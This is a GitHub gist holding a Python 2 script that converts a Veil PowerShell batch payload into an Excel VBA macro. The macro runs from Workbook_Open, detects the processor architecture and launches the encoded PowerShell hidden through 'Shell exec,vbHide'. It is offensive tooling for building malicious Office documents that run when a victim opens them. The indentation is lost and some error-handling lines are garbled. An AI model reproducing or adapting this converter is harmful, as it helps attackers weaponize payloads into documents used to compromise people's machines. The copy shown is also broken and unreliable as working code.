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Created June 24, 2015 00:45
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Save ChrisTruncer/db04a01f8b1729b2b1a3 to your computer and use it in GitHub Desktop.
Veil batch to macro converter - not created by me
# Takes Veil powershell batch file and outputs into a text document
# macro safe text for straight copy/paste.
import os, sys
import re
def formStr(varstr, instr):
holder = []
str1 = ''
str2 = ''
str1 = varstr + ' = "' + instr[:54] + '"'
for i in xrange(54, len(instr), 48):
holder.append(varstr + ' = '+ varstr +' + "'+instr[i:i+48])
str2 = '"\r\n'.join(holder)
str2 = str2 + "\""
str1 = str1 + "\r\n"+str2
return str1
if len(sys.argv) < 2:
print "----------------------\n"
print " Macro Safe\n"
print "----------------------\n"
print "\n"
print "Takes Veil batch output and turns into macro safe text\n"
print "\n"
print "USAGE: " + sys.argv[0] + " <input batch> <output text>\n"
print "\n"
fname = sys.argv[1]
f = open(fname)
lines = f.readlines()
cut = []
for line in lines:
if "@echo off" not in line:
first = line.split('else')
#split on else to truncate the back half
# split on \"
cut = first[0].split('\\"', 4)
#get rid of everything before powershell
cut[0] = cut[0].split('%==x86')[1]
cut[0] = cut[0][2:]
#get rid of trailing parenthesis
cut[2] = cut[2].strip(" ")
cut[2] = cut[2][:-1]
# for i in range(0,3):
# print str(i) + " " +cut[i]
top = "Sub Workbook_Open()\r\n"
top = top + "\'VBA arch detect suggested by \"T\"\r\n"
top = top + "Dim Command As String\r\n"
top = top + "Dim str As String\r\n"
top = top + "Dim exec As String\r\n"
top = top + "\r\n"
top = top + "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")\r\n"
top = top + "windir = Environ(\"windir\")"
top = top + "\r\n"
top = top + "If Arch = \"AMD64\" Then\r\n"
top = top + "\tCommand = windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"\r\n"
top = top + "Else\r\n"
top = top + "\tCommand = \"powershell.exe\"\r\n"
top = top + "End If\r\n"
#insert '\r\n' and 'str = str +' every 48 chars after the first 54.
payL = formStr("str", str(cut[1]))
#double up double quotes, add the rest of the exec string
idx = cut[0].index('"') #tells us where IEX is. Now we also have to subtract 10 to remove -Command
#next our stub for the payload
cut[0] = cut[0] + "\\\"\" \" & str & \" \\\"\" " + cut[2] +"\"" #deprecated
#insert 'exec = exec +' and '\r\n' every 48 after the first 54.
execStr = formStr("exec", str(cut[0]))
execStr = execStr.replace("\"powershell.exe", "Command + \"")
execStr = execStr.replace("\"Invoke","\"\"Invoke")
shell = "Shell exec,vbHide"
bottom = "End Sub\r\n\r\n\'---Generated by by khr0x40sh---\r\n\r\n\'---VBA arch detection by \"T\"---"
final = ''
final = top + "\r\n" + payL + "\r\n\r\n" + execStr + "\r\n\r\n" + shell + "\r\n\r\n" + bottom + "\r\n"
print final
f = open(sys.argv[2],'w')
f.write(final) # python will convert \n to os.linesep
print "Error writing file.\n Please check permissions and try again.\nExiting..."
print "File written to " + sys.argv[2] + " !"
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